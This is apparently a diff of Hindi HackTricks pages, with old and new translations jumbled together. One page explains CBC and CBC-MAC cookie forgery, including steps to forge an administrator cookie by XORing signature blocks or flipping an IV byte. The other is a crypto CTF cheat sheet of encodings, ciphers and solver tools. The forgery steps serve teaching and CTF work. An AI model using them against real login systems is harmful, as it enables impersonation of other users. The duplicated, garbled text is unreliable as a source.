HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# CBC # CBC
यदि **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** **ब्रूटफोर्स** कर सकते हैं। अगर **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**एडमिन**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** **ब्रूटफोर्स** कर सकते हैं।
# CBC-MAC # CBC-MAC
रहस्यमयता में, एक **साइफर ब्लॉक चेनिंग संदेश प्रमाणीकरण कोड** (**CBC-MAC**) एक तकनीक है जिसका उपयोग एक ब्लॉक साइफर से संदेश प्रमाणीकरण कोड निर्मित करने के लिए किया जाता है। संदेश को कुछ ब्लॉक साइफर एल्गोरिदम के साथ सीबीसी मोड में एन्क्रिप्ट किया जाता है ताकि प्रत्येक ब्लॉक पिछले ब्लॉक के सही एन्क्रिप्शन पर निर्भर हो। यह आपसी आश्रितता सुनिश्चित करता है कि किसी भी प्लेनटेक्स्ट **बिट्स** में कोई **परिवर्तन** होने पर **अंतिम एन्क्रिप्टेड ब्लॉक** को एक ऐसे तरीके से **परिवर्तित** करेगा जिसे पूर्वानुमान या ब्लॉक साइफर कुंजी को नहीं जानकर नहीं रोका जा सकता **साइफर ब्लॉक चेनिंग मैसेज ऑथेंटिकेशन कोड** (**CBC-MAC**) एक विधि है जो गुप्तशास्त्र में प्रयोग की जाती है। यह एक संदेश लेकर उसे ब्लॉक द्वारा एन्क्रिप्ट करने के द्वारा काम करता है, जहां प्रत्येक ब्लॉक की एन्क्रिप्शन पिछले ब्लॉक से जुड़ी होती है। यह प्रक्रिया एक **ब्लॉकों की श्रृंखला** बनाती है, जिससे सुनिश्चित होता है कि मूल संदेश के एक भी बिट को बदलने से एन्क्रिप्ट किए गए डेटा के अंतिम ब्लॉक में एक अप्रत्याशित परिवर्तन होगा। इस परिवर्तन को बनाने या उलटाने के लिए, एन्क्रिप्शन कुंजी की आवश्यकता होती है, जो सुरक्षा सुनिश्चित करता है
संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को सीबीसी मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक संदेश का CBC-MAC की गणना करने की रूपरेखा दी गई है![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ: संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को CBC मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक गुप्त कुंजी k और एक ब्लॉक साइफर E का उपयोग करके संदेश का CBC-MAC की गणना की गई है![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5):
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
# सुरक्षा दोष # सुरक्षा दोष
@ -38,44 +39,45 @@ CBC-MAC के साथ आम तौर पर **इस्तेमाल क
* `E(m1 XOR 0) = s31 = s1` * `E(m1 XOR 0) = s31 = s1`
* `E(m2 XOR s1) = s32` * `E(m2 XOR s1) = s32`
**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए गणना किया जा सकता है।** **जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए भी गणना की जा सकती है।**
सोचिए आप **8 बाइट** ब्लॉक में नाम **प्रशासक** को एन्क्रिप्ट कर रहे हैं: सोचिए आप **8 बाइट** ब्लॉक में नाम **एडमिनिस्ट्रेटर** को एन्क्रिप्ट कर रहे हैं:
* `Administ` * `एडमिनिस्ट`
* `rator\00\00\00` * `रेटर\00\00\00`
आप उपयोगकर्ता नाम **Administ** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\ आप उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर (s1) प्राप्त कर सकते हैं।\
फिर, आप `rator\00\00\00 XOR s1` के परिणाम को उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\ फिर, आप `रेटर\00\00\00 XOR s1` का परिणाम वाला उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\
अब, आप s32 का उपयोग **प्रशासक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं। अब, आप s32 का उपयोग करके पूरे नाम **एडमिनिस्ट्रेटर** का हस्ताक्षर उपयोग कर सकते हैं।
### सारांश ### सारांश
1. उपयोगकर्ता नाम **Administ** (m1) का हस्ताक्षर प्राप्त करें जो s1 है 1. उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर प्राप्त करें जो s1 है
2. उपयोगकर्ता नाम **rator\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**.** 2. उपयोगकर्ता नाम **रेटर\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है****
3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **प्रशासक** के लिए एक मान्य कुकी होगी। 3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **एडमिनिस्ट्रेटर** के लिए एक मान्य कुकी होगी।
# हमला नियंत्रण IV # हमला नियंत्रण IV
यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\ यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\
यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**प्रशासक**" का उपयोगकर्ता बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\ यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**एडमिनिस्ट्रेटर**" का अनुकरण करने के लिए आप उपयोगकर्ता "**एडमिनिस्ट्रेटर**" बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\
अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **प्रशासक** के लिए कुकी पुनः उत्पन्न कर सक हैं। यह कुकी **प्रशासक** के उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी। अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **एडमिनिस्ट्रेटर** के लिए कुकी पुनः उत्पन्न कर सकें। यह कुकी **उपयोगकर्ता एडमिनिस्ट्रेटर** का अनुकरण करने के लिए मान्य होगी।
# संदर्भ ## संदर्भ
अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# क्रिप्टो सीटीएफएस ट्रिक्स # क्रिप्टो सीटीएफ़ ट्रिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## ऑनलाइन हैश डेटाबेस ## ऑनलाइन हैश डेटाबेस
@ -28,16 +29,16 @@ HackTricks का समर्थन करने के अन्य तरी
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
## जादू ऑटोसॉल्वर्स ## मैजिक ऑटोसॉल्वर्स
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (जादू मॉड्यूल) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (मैजिक मॉड्यूल)
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
## एन्कोडर्स ## एन्कोडर्स
अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डकोड किया जा सकता है: अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डिकोड किया जा सकता है:
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
@ -58,81 +59,34 @@ HackTricks का समर्थन करने के अन्य तरी
### बेस एन्कोडिंग्स ऑटोसॉल्वर ### बेस एन्कोडिंग्स ऑटोसॉल्वर
इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* **हैज़15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
* **एस्की85**
* `BQ%]q@psCd@rH0l`
* **बेस26** \[_A-Z_]
* `BQEKGAHRJKHQMVZGKUXNT`
* **बेस32** \[_A-Z2-7=_]
* `NBXWYYLDMFZGCY3PNRQQ====`
* **Zबेस32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
* `pbzsaamdcf3gna5xptoo====`
* **बेस32 जियोहैश** \[_0-9b-hjkmnp-z_]
* `e1rqssc3d5t62svgejhh====`
* **बेस32 क्रॉकफोर्ड** \[_0-9A-HJKMNP-TV-Z_]
* `D1QPRRB3C5S62RVFDHGG====`
* **बेस32 विस्तारित हेक्साडेसिमल** \[_0-9A-V_]
* `D1NMOOB3C5P62ORFDHGG====`
* **बेस45** \[_0-9A-Z $%\*+-./:_]
* `59DPVDGPCVKEUPCPVD`
* **बेस58 (बिटकॉइन)** \[_1-9A-HJ-NP-Za-km-z_]
* `2yJiRg5BF9gmsU6AC`
* **बेस58 (फ्लिकर)** \[_1-9a-km-zA-HJ-NP-Z_]
* `2YiHqF5bf9FLSt6ac`
* **बेस58 (रिप्पल)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
* `pyJ5RgnBE9gm17awU`
* **बेस62** \[_0-9A-Za-z_]
* `g2AextRZpBKRBzQ9`
* **बेस64** \[_A-Za-z0-9+/=_]
* `aG9sYWNhcmFjb2xh`
* **बेस67** \[_A-Za-z0-9-_.!\~\_]
* `NI9JKX0cSUdqhr!p`
* **बेस85 (एस्की85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `BQ%]q@psCd@rH0l`
* **बेस85 (एडोबी)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `<~BQ%]q@psCd@rH0l~>`
* **बेस85 (IPv6 या RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
* `Xm4y`V\_|Y(V{dF>\`
* **बेस85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
* **बेस85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
* `Xm4y|V{~Y+V}dF?`
* **बेस91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
* `frDg[*jNN!7&BQM`
* **बेस100** \[]
* `👟👦👣👘👚👘👩👘👚👦👣👘`
* **बेस122** \[]
* `4F ˂r0Xmvc`
* **एटम-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
* `DmPsv8J7qrlKEoY7` * `DmPsv8J7qrlKEoY7`
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * **मेगान35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
* `kLD8iwKsigSalLJ5` * `kLD8iwKsigSalLJ5`
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] * **जॉंग22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
* `ayRiIo1gpO+uUc7g` * `ayRiIo1gpO+uUc7g`
* **ESAB46** \[] * **एसएबी46** \[]
* `3sHcL2NR8WrT7mhR` * `3sHcL2NR8WrT7mhR`
* **MEGAN45** \[] * **मेगान45** \[]
* `kLD8igSXm2KZlwrX` * `kLD8igSXm2KZlwrX`
* **TIGO3FX** \[] * **टिगो3एफएक्स** \[]
* `7AP9mIzdmltYmIP9mWXX` * `7AP9mIzdmltYmIP9mWXX`
* **TRIPO5** \[] * **त्रिपो5** \[]
* `UE9vSbnBW6psVzxB` * `UE9vSbnBW6psVzxB`
* **FERON74** \[] * **फेरोन74** \[]
* `PbGkNudxCzaKBm0x` * `PbGkNudxCzaKBm0x`
* **GILA7** \[] * **गिला7** \[]
* `D+nkv8C1qIKMErY1` * `D+nkv8C1qIKMErY1`
* **Citrix CTX1** \[] * **सिट्रिक्स सीटीएक्स1** \[]
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 डेड: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) [http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### हैकराइज़ एक्सएस \[_╫Λ↻├☰┏_] ### हैकराइज़एक्सएस \[_╫Λ↻├☰┏_]
``` ```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ ╫☐↑Λ↻Λ┏Λ↻☐↑Λ
``` ```
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मरा हुआ: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) * [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मृत: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### मोर्स ### मोर्स
``` ```
@ -176,7 +130,7 @@ ryvkryvkryvkryvkryvkryvkryvk
``` ```
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85 ### एएससीआई85
``` ```
<~85DoF85DoF85DoF85DoF85DoF85DoF~> <~85DoF85DoF85DoF85DoF85DoF85DoF~>
``` ```
@ -196,17 +150,17 @@ drnajapajrna
``` ```
### अफाइन गुप्ताक्षर एन्कोड ### अफाइन गुप्ताक्षर एन्कोड
पत्र को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ पत्र है) और परिणाम को फिर से पत्र में बदलें अक्षर को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ अक्षर है) और परिणाम को फिर से अक्षर में बदलें
``` ```
krodfdudfrod krodfdudfrod
``` ```
### एसएमएस कोड ### एसएमएस कोड
**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित दोहरी अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\ **मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन की पैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित बार-बार अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\
उदाहरण: 2=A, 22=B, 222=C, 3=D...\ उदाहरण: 2=A, 22=B, 222=C, 3=D...\
आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे। आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे।
आप इस कोड को डकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) आप इस कोड को डिकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
### बेकन कोड ### बेकन कोड
@ -221,9 +175,9 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
## संक्षेपण ## संक्षेपण
**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विस्तारित कर सकते हैं। **Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विसंक्षेपित कर सकते हैं।
## सरल क्रिप्टो ## सरल एन्क्रिप्शन
### XOR - ऑटोसॉल्वर ### XOR - ऑटोसॉल्वर
@ -274,22 +228,23 @@ Key:
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF)
## Tools ## उपकरण
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

